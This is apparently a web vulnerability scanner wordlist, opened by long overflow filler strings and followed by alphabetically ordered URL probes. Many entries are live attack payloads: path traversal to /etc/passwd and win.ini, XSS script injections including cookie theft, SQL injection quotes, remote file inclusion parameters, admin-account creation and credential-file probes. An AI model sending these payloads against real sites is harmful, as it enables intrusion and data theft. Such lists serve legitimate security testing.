AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
/ab2/
/ab2/@AdminAddadmin?uid=foo&password=bar&re_password=bar
/ab2/@AdminViewError
/abbc.css.php?ABBC[Config][smileset]=/../../../../../../../../boot.ini%00
/abbc.css.php?ABBC[Config][smileset]=/../../../../../../../../etc/passwd%00
/abbc.css.php?ABBC[Config][smileset]=/../../../../../../../../winnt/win.ini%00
/abc/
/abook.php?func=view&abookview=global%22%3E%3Cimg%2Fsrc%2Fonerror%3D%22alert%2810800%29&email=138195
/about/
/about_us.php?gid=0%27
/abracadabra.bat
/abracadabra.cmd
/abuse.man?file=&domain=&script=
/acart/
/acart2_0/
/acart2_0/acart2_0.mdb
/acartpath/
/acartpath/signin.asp?msg=<script>alert('CSS')</script>
/accept/
/acceptDecline.php?beanFiles[1]=/../../../../../../../../boot.ini%00&beanList[1]=1&module=1
/acceptDecline.php?beanFiles[1]=/../../../../../../../../etc/passwd%00&beanList[1]=1&module=1
/acceptDecline.php?beanFiles[1]=/../../../../../../../../winnt/win.ini%00&beanList[1]=1&module=1
/acceso/
/access
/access-log
/access-log/
/access.log
/access.txt
/access/
/AccessCodeStart.asp?msg=%3Cscript%3Ealert%2810518%29%3C%2Fscript%3E
/accessinglog/
/accesslog/
/accesso/
/accesswatch/
/access_log
/acciones/
/account
/account.nsf
/account.nsf/?OpenDatabase
/account/
/accounting
/accounting/
/accountlogon.cfm?rtn=1"><script>alert("403397101255");</script><"234
/accounts
/accounts.asp
/accounts.nsf
/accounts.nsf/?OpenDatabase
/accounts/
/accounts/getuserdesc.asp
/accounts/inc/include.php?language=0&lang_settings[0][1]=cnt\win.ini%00
/accounts/inc/include.php?language=0&lang_settings[0][1]=ct.ini%00
/acctman/info
/achievo/
/achievo//atk/javascript/class.atkdateattribute.js.php?config_atkroot=http://xxxxxxxxxx/
/achievo/atk/javascript/class.atkdateattribute.js.php?config_atkroot=http://vulnerable/
/acid/
/acid/acid_main.php
/ackcmdc.exe
/acp/lib/session.php
/acp/lib/session.php?lastvisit=%27
/acp/lib/session.php?userid=%27
/action.php
/action.php/%22%3e%3cscript%3ealert(xss)%3c%2fscript%3e
/action.php/%22%3E%3Cscript%3Ealert(xss)%3C/script%3E
/action.php?action=addcomment
/action/LoginActions
/activatemember?activatecode=%22%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/activatemember?activatecode=&member=%22%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/activateuser.php?language=/../../../../../../../../boot.ini%00
/activateuser.php?language=/../../../../../../../../etc/passwd%00
/activateuser.php?language=/../../../../../../../../winnt/win.ini%00
/active.asp
/active.log
/active/
/activeauctionsuperstore/default.asp?catid='
/activeauctionsuperstore/default.asp?Sortby='
/activeauctionsuperstore/default.asp?Sortby=ItemName&SortDir='
/activeauctionsuperstore/ItemInfo.asp?itemID='
/activex/
/actuate/
/acweb/
/ad.cgi
/ad.cgi?file=../../../../../../../../etc/hosts
/ad/
/adcontent.php
/adcycle/
/adcycle/adcenter.cgi
/add.php
/add.php3?url=http://www.vulnerable.com&adurl=http://www.vulnerable.com/img.gif/
/add.php3?url=ja&adurl=
/add.php?language%5BENTER_ARTICLE_TITLE%5D=%22%29%3B%7D%7D--%3E%3C%2Fscript%3E%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/add/
/addbanner.cgi
/addcustomer.asp
/addentry.php?phpbb_root_path=/../../../../../../../../boot.ini%00
/addentry.php?phpbb_root_path=/../../../../../../../../etc/passwd%00
/addentry.php?phpbb_root_path=/../../../../../../../../winnt/win.ini%00
/AddGatewaySettings.asp?action=add
/addguest.cgi
/addnews.php
/addons/fckeditor2rc2/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=../../../../../../../../&CurrentFolder=
/addpinuser.cgi
/addprod.asp
/address/
/addressbook.php?address=1%27
/addressbook.php?\
/adduser.cgi
/addyoursite.php?catid=&lt
/addyoursite.php?catid=<Script>JavaScript:alert('vulnerable');</Script>
/add_category.asp
/add_comment.php?id=%22%3E%3Cscript%3Ealert(xss)%3C/script%3E%3C%22
/add_edit_cat.asp?page_type=2&cat_id=%27
/add_edit_download.asp?page_type=2&download_id=%27
/add_edit_news.asp?page_type=2&Content_ID=%27
/add_edit_poll.asp?page_type=2&Poll_ID=%27
/add_edit_user.asp?page_type=2&user_id=%27
/add_ftp.cgi
/add_ftp.pl
/add_user.cgi
/add_user.php
/AdLogin.pm
/adm
/adm/
/admcgi/
/admcgi/contents.htm
/admcgi/scripts/Fpadmcgi.exe
/admentor/
/admentor/ad97.mdb
/admentor/admin/
/admentor/admin/admin.asp
/admentor/adminadmin.asp
/admin
/admin-serv/
/admin-serv/config/adm.conf
/admin-serv/config/admpw
/admin-serv/config/admpw 
/admin-serv/tasks/configuration/ViewLog?file=boot.ini&num=5000&str=&directories=admin-serv%2Flogs%2f..%2f..%2f..%2f..%2f..%2f..%2f&id=admin-serv
/admin-serv/tasks/configuration/ViewLog?file=passwd&num=5000&str=&directories=admin-serv%2Flogs%2f..%2f..%2f..%2f..%2f..%2f..%2fetc&id=admin-serv
/admin-serv/tasks/configuration/ViewLog?file=win.ini&num=5000&str=&directories=admin-serv%2Flogs%2f..%2f..%2f..%2f..%2f..%2f..%2fwinnt&id=admin-serv
/admin.asp
/admin.aspx
/admin.bak
/admin.cfg
/admin.cfm
/admin.cgi
/admin.conf
/admin.dat
/admin.data
/admin.db
/admin.dbf
/admin.exe
/admin.htm
/admin.html
/admin.htx
/admin.ini
/admin.jsp
/admin.lst
/admin.nsf
/admin.php
/admin.php/%3cscript%3ealert(xss)%3c%2fscript%3e
/admin.php3
/admin.php3?admin=anything
/admin.php3?admin=whatever
/admin.php4?reg_login=1
/admin.php?"><script>alert(document.cookie);</script>
/admin.php?"><script>alert(xss)</script><"
/admin.php?a=headers&msg=%27
/admin.php?action=full&id=-1%27
/admin.php?action=phpinfo
/admin.php?com_option=%3E%22%27%3E%3CSCRIPT%3Ea%3D10144%3Balert%28a.source%29%3C%2FSCRIPT%3E
/admin.php?en_log_id=0&action=config
/admin.php?en_log_id=0&action=users
/admin.php?GroupsId=%27
/admin.php?ItemsId=%27
/admin.php?loggedin=1
/admin.php?MK_PATH=1
/admin.php?module%5B%5D=groups
/admin.php?module=badwords&curr=%27&delete=1
/admin.php?module=groups&edit=1&group_id=%22%3E%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/admin.php?module=modsettings&mod=smileys&edit=1&smiley_id=%22%3E%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/admin.php?module=NS-Languages&op=missing&language=%22%3E%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/admin.php?module=NS-Languages&op=missing&language=%27
/admin.php?module=NS-Languages&op=translation&language=%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/admin.php?module=Past_Nuke&op=deleteNotice
/admin.php?op=editArticleCategories
/admin.php?op=view&db_table=support_desk&tile=support_desk_list&where=WHERE+call_status=%27
/admin.php?op=view&db_table=todo_list&tile=todo&where=%27
/admin.php?op=view&db_table=todo_list&tile=todo&where=WHERE+todo_status=%27
/admin.php?op=view&db_table=todo_list&where=&order=%27
